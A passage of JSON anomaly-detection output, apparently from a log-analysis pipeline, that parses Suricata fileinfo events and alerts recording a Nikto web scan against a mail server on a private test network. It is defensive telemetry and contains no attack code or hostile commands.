"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.TPF\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.TPF\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.TPF", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.TPF", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46768, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1112705751193243,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1112705751193243, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.138485+0000\",\"flow_id\":1112705751193243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.14 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.154534 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46770 -> 192.168.10.154:80", "/parser/model/time": 1583349514.154534, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46770, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.154534 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46770 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.15 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.SSIFilter", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.154766+0000\",\"flow_id\":124996417115902,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.154766, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":124996417115902,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.SSIFilter\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.SSIFilter\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.SSIFilter", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.SSIFilter", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46770, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":124996417115902,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 124996417115902, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.154766+0000\",\"flow_id\":124996417115902,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.15 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.156769 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46772 -> 192.168.10.154:80", "/parser/model/time": 1583349514.156769, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46772, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.156769 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46772 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.TXT", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.156961+0000\",\"flow_id\":1001345839161358,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.156961, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1001345839161358,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.TXT\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.TXT\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.TXT", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.TXT", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46772, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1001345839161358,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1001345839161358, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.156961+0000\",\"flow_id\":1001345839161358,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.159041 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46774 -> 192.168.10.154:80", "/parser/model/time": 1583349514.159041, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46774, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.159041 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46774 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 